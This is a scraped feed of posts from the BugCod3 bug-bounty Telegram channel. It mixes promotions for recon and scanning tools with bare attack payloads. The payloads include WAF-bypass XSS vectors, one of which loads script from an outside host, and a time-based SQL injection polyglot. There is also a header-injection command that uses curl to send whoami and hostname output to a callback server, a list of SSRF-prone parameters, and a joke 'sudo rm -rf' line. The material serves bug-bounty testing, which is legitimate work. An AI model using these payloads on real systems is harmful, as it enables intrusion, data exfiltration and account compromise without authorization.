SubCerts

💬
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.

📊 Features:
⚪️ Subdomain Extraction: Utilizes crt.sh, a certificate transparency log search engine, to gather subdomains associated with a target domain.

⚪️ HTTP Probing: Automatically sends HTTP/HTTPS requests to each extracted subdomain using httpx and
returns:
⚫️ HTTP status codes
⚫️ Page titles
⚫️ Silent output for clean and organized results

⚪️ Automation: Run the tool with a simple command and get results efficiently without manual effort.

⚪️ Flexible Output: Optionally save the extracted subdomains and httpx results to a file for later review.

🔼 Installation:

cd SubCerts
chmod +x *.sh
./setup.sh
./subcerts.sh -h

💻 Usage:
To run SubCerts for a domain and save the results to a file:

./subcerts.sh -u example.com --output results.txt

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #SubDomain #certificate
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

WAF bypass payloads

- Imperva/AWS
<details/open/id="&quot;"ontoggle=[JS]>

- Akamai
<details open id="' &quot;'"ontoggle=[JS]>``

#WAF #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS

Watch out for reflected XSS in the search parameter!

Payload:

"-->""/>Hack by Fagun</script><deTailS open x=">" ontoggle=(co\u006efirm)``>"

#XSS #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Export to GBounty

💬
Export to GBounty is a Burp Suite extension developed using the Montoya API. It allows users to export selected HTTP requests from Burp Suite, including the Site Map Tree, Repeater, and Message Editor, into a compressed ZIP file. This ZIP file can be directly used with the GBounty scanner using the command ‍`gbounty -rf requests.zip`, enabling streamlined vulnerability scanning and management.

📊 Features:
⚪️ Effortless Export: Easily export selected HTTP requests from multiple sources within Burp Suite.
⚪️ Compressed Format: Saves requests in a ZIP archive, optimizing storage and transfer.
Unique File Naming: Each request is saved as a uniquely named text file within the ZIP to prevent conflicts.
⚪️ Wide Compatibility: Supports exporting from Site Map Tree, Repeater, Message Editor, and other compatible tools.
⚪️ User-Friendly Interface: Adds a context menu option "Export to GBounty" for a seamless user experience.
⚪️ Robust Error Handling: Provides clear notifications regarding the export status, including overwrite confirmations and error messages.

🔼 Installation:
Prerequisites
⚪️ Java Development Kit (JDK): Ensure you have JDK 8 or higher installed.
⚪️ Burp Suite: The extension is compatible with Burp Suite Professional and Burp Suite Community.

💻 Usage:
Select Requests to Export:

Within Burp Suite, select the HTTP requests you wish to export from the Site Map Tree, Repeater, Message Editor, or other supported tools.

📂 Export Requests:
Right-click on the selected requests. Choose the Export to GBounty option from the context menu.

📂 Run GBounty Scanner:
Use the exported ZIP file with the GBounty scanner by executing the following command in your terminal:

gbounty -rf requests.zip

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #GBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XٓSS

Bypass #Akamai, #Imperva and #CloudFlare WAF 🧱🔥

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#BugBounty #Tips #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Time based SQLi Payload 💣

if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/

Injection Points 💉
URI
parameter name (before & after)
parameter value (before & after)
HTTP Headers like User-Agent,etc...

#SQLi #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

HACKER search engines

#BugBounty #Search #Engines #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Hacking Articles- Cyber Security Mindmap

💬
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them

😸 Github

#Cyber #Security #Mindmap
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

RCE - Can we still use this in HTTP Header?

`
'
;
$
>

curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

JSNinja - "Hunting Bugs in JavaScript!"

💬
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.

📊 Features:
➕ Extract URLs from JavaScript files!
➕ Identify sensitive information such as API keys and tokens!
➕ User-friendly interface!
➕Open Source and actively maintained!

🔼 Installation:

sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txt

💻 Usage:

python3 jsninja.py -u http://example.com/script.js --secrets --urls

Command-Line Options:
⚪️ -u or --url: Specify a single JavaScript URL to fetch.
⚪️ --secrets: Look for sensitive information in the JavaScript content.
⚪️ --urls: Extract URLs from the JavaScript content.
⚪️ -o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #JS #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Top 25 server-side request forgery (SSRF) parameters

Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}

Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to:

⚪️ Access services on the loopback interface of the remote server
⚪️ Scan internal network an potentially interact with internal services
⚪️ Read local files on the server using file:// protocol handler
⚪️ Move laterally / pivoting into the internal environment

#SSRF #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CloudFlare XSS Bypass!

OnXSS=<Img/Src/OnError=alert(1)>

It's better than our previous <Img Src=OnXSS OnError=alert(1)> because it works where no spaces are allowed.

#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦅 Blackbird 🦅

💬
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.

🔼 Installation:

cd blackbird
pip install -r requirements.txt

💻 Usage:
Search by username 👤
python blackbird.py --username username1 username2 username3

Search by email 🌐
python blackbird.py --email email1@email.com email2@email.com email3@email.com

Export results to PDF 📂
python blackbird.py --email email1@email.com --pdf

✨ AI:
Blackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --ai

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Osint #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

javascript How to extract urls,srcs and hrefs from all HTML elements in any website? Open DevTools and run

urls = []
$$('*').forEach(element => {
  urls.push(element.src)
  urls.push(element.href)
  urls.push(element.url)
}); console.log(...new Set(urls))

#js #extract #urls
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *2024

┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 2025

#Notification #NewYear
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection

💬
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable

Affected Versions:
⚪️ FortiOS 7.0.0 through 7.0.16
⚪️ FortiProxy 7.0.0 through 7.0.19
⚪️ FortiProxy 7.2.0 through 7.2.12

😸 Github

⬇️ Download
🔒 BugCod3

#Python #CVE #Vulnerable #Detection
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

HExHTTP

💬
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

📊 Features:
⚪️ Server Error response checking
⚪️ Localhost header response analysis
⚪️ Vhosts checking
⚪️ Methods response analysis
⚪️ HTTP Version analysis [Experimental]
⚪️ Cache Poisoning DoS (CPDoS) techniques
⚪️ Web cache poisoning
⚪️ Range poisoning/error (416 response error) [Experimental]
⚪️ Cookie Reflection
⚪️ CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) [IP]

🔼 Installation:

pip install -r requirements.txt
./hexhttp.py -u 'https://target.tld/'
# OR
python3 hexhttp.py -u 'https://target.tld/'

💻 Usage:

./hexhttp.py -h
# Usage: hexhttp.py [-h] [-u URL] [-f URL_FILE] [-H CUSTOM_HEADER] [-A USER_AGENT] [-F] [-a AUTH] [-b]

😸 Github

⬇️ Download
🔒 BugCod3

#Python #HTTP #Headers #Analyze
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

IDOR-Forge

IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

💬 Description:
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.

📊 Features:
⚪️ Dynamic Payload Generation
⚪️ Multi-Parameter Scanning
⚪️ Support for Multiple HTTP Methods
⚪️ Concurrent Scanning
⚪️ Rate Limiting Detection
⚪️ Customizable Test Values
⚪️ Sensitive Data Detection
⚪️ Proxy Support
⚪️ Interactive GUI Mode
⚪️ Verbose Mode
⚪️ Output Options
⚪️ Custom Headers
⚪️ Session Handling

🔼 Installation:

pip install -r requirements.txt
python IDOR-Forge.py

💻 Usage:

# CLI Basic Usage

python IDOR-Forge.py -u "https://example.com/api/resource?id=1"

# Advanced Usage

python IDOR-Forge.py -u "https://example.com/api/resource?id=1" -p -m GET --proxy "http://127.0.0.1:8080" -v -o results.csv --output-format csv

python IDOR-Forge.py -u http://example.com/resource?id=1 -p -m GET --output results.csv --output-format csv --test-values [100,200,300] --sensitive-keywords ["password", "email"]

🖼 Interactive GUI Mode:

python idor_hunter.py --interactive

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Idor #Vulnerability #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🎯 Directory-Traversal-Payloads 🎯

List of Directory Traversal/LFI Payloads Scraped from the Internet

😸 Github

⬇️ Download
🔒 BugCod3

#Payload #Directory
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3